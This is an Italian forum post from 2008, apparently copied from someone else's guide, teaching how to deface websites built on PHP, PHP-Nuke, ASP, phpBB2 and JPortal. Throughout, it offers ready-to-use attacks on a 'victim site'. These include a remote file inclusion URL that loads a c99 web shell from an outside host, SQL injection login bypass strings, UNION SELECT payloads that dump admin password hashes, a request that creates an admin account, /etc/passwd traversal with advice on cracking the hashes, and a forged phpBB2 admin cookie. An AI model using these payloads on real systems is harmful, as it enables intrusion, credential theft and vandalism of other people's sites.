Il termine Defacing vuol dire hackerare un sito, cioè cambiare l’Home Page o più pagine infatti bisogna distinguere due tipi di Deface:
* Deface: Deface normale con il solo cambio di index (Pagina iniziale)
* Mass Deface: Cancellazione o Modificazione di tutti i file dell’FTP
Ci sono varie tecniche per il Defacing, noi ne esamineremo 8: Remote File Inclusion, SQL Injection, ASP Injection, XSS (Cross Site Scripting), Remote Command Injection, Cookie Manipulation, Google Hacking e gli Exploit.
In questa guida parleremo di questi attacchi per 10 tipi di Siti:
1. PHP Site
2. PHP-Nuke Site
3. ASP Site
4. HTML Site
5. PHPBB
6. PHPBB2 Forum
7. JPortal
8. GuestBook
9. Invision PowerBoard
10. Powered by FrontPage
Ma ecco in dettaglio le varie mini-guide:
* PHP Site
Per defacciare un sito in PHP potete usare un Remote File Inclusion e siete dentro. Per fare ciò basta scrivere:
www.sitovittima.it/index.php?pag=http://badangelc99.altervista.org/c99.jpg (tutto attaccato).
Dove al posto di
http://badangelc99.altervista.org ci mettete il vostro sito naturalmente con la c99 (Shell) dentro, che va messa usando l’FTP.
Oppure si può usare la tecnica SQL Injection, scrivendo nel login:
UserName: ‘or’’=’
Password: ‘or’’=’
Se invece il sito è patchato provvediamo con dei Bug. Proviamo scrivendo nel sito vittima un percorso ke potrebbe portarci all’intera lista di password:
www.sitovittima.it/cgi-bin/php.cgi?/etc/passwdSe vi vedete spuntare qualcosa allora avrete d’avanti la lista di password in MD5 (un sistema di crittografia per le pass in rete). Per decifrarle salvate tutto in un txt e chiudete la connessione. Andate su un sito per pass MD5 (vedere in fondo alla guida) o usate un programma come “Cain & Abel” (un potentissimo BruteForcer per pass in md5). Se la stringa non ci porta da nessuna parte scriviamo:
www.sitovittima.it/~dumbuser/cool-logs/mlog.html?screen=etc/passwd (tutto attaccato)
Se non trovate niente pure questa volta si vede che l’Admin è un pò furbo quindi non vi resta che provare l’ultima alternativa. Andate nel percorso
www.sitovittima.it/~dumbuser/cool-logs/mylog.html?screen=etc/passwd (tutto attaccato)
Dove al posto di /mlog.html? è stato scritto /mylog.html?. Se non funziona neanche questo lasciate perdere oppure smanettate un pò
.
* PHP-Nuke Site
Ora vi illustro 3 exploit moderni e funzionanti;
Exploit – Modulo Cerca
Andate nel modulo Cerca, ossia la barra dove si mette la parola che vogliamo cercare nel sito e scriviamo: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* premiamo invio e siamo in Root come amministratori.
Exploit – Top10
Questo modulo non è presente in tutti i siti in PHP-Nuke, anzi in pochi ormai. Ma con un pò di fortuna lo potremmo trovare e al quel punto basta andare in un percorso del sito e iniettare l’exploit:
www.sitovittima.it/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd
,1,1%20FROM%20nuke_authors (tutto attaccato).
Se funziona ci collegheremo come Admin.
Exploit – Sql Injection
Scriviamo nella barra degli indirizzi la stringa:
http://sito_vittima/admin.php?foo=bar&admin=eCcgT1IvKjp5Avremo come risultato una scritta che dice “Selection from the databse failed!” Se avremo esattamente questo risultato siamo dentro.
Con la stringa
http://sito_vittima/admin.php?op=AddAuthor=0VMRUNUIDEvKjox si può creare un nuovo User con privilegi amministrativi con il Nick badangel e Pass topsecret e possiamo fare quello che vogliamo. Se invece volete Nick e Pass tutto vostro allora basta agire sui valori add_aid per il Nick e add_pwd per la Pass
* ASP Site
In questo caso possiamo usare la tecnica ASP Injection. Ecco varie stringhe da inserire nel Login Utente per avere i permessi Root
Diventare Utenti senza Neanche registrarsi:
UserName: apostrofo
Password: [nessuna password, lasciate vuoto]
Accedere da Admin:
UserName: ‘ union select Password,1,1,1 from members where UserID = ‘admin’—
Password: [nessuna password]
Diventare automaticamente amministratori
UserName: admin’ –
Password: [nessuna pass]
Primo utente nella lista
UserName: ‘ or 0=0 –sp_password
Password: [nessuna pass]
* HTML Site
L’HTML sappiate che, a differenza dei siti in PHP e ASP (che sono linguaggi dinamici), è un linguaggio statico (si chiama anche linguaggio di Markup) o quindi non può essere Hackerato o quasi.
L’unico modo per hackerare un sito in html sarebbe quello di trovare qualche Bug nell’FTP o nel Finger. Oltre a questi attacchi possono essere vulnerabili a XSS.
* PHPBB & PHPBB2 Forum
Esistono molti exploit per i forum in PHPBB & PHPBB2, ma sono exploit da compilare in C e da includere nel sito. Quindi per defacciare utilizzando degli exploit bisogna sapere il Linguaggio C. Esiste comunque un bel exploit che ci permette di diventare Root in un forum, l’unica pecca è che dobbiamo usare Firefox. La tecnica che andremo ad utilizzare è Cookie Manipulation. Innanzitutto cancelliamo tutti i Cookie. Entriamo nel sito in PHPBB2 e usciamo. Adesso utliziamo l’Add-On Extended Cookie Manager 0.8.1 o View Cookies CS 1.0.7 (che ci permettono di modificare i cookie) e apriamo il cookie ke ci ha mandato il forum (l’unico che c’è perchè li abbiamo cancellati tutti prima).
Se avremo una scritta del genere 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D. Sostituiamola con questa: 127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D (tutto attaccato).
Salvate tutto e torniamo al forum. Adesso saremo admin.
PS: Smanettando un pò con i cookie potete accedere in Root in molti siti.
* JPortal
Per hackerare un sito in JPortal basta Injettare all’URL un codice (SQL Injection) e poi fare il Login:
www.sitovittima.it/print.php?what=article&id=1%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20
from%20admins%20LIMIT%201 (tutto attaccato)
FONTE: guida di Linux_Windows
Edited by greywolf92 - 27/12/2008, 12:11
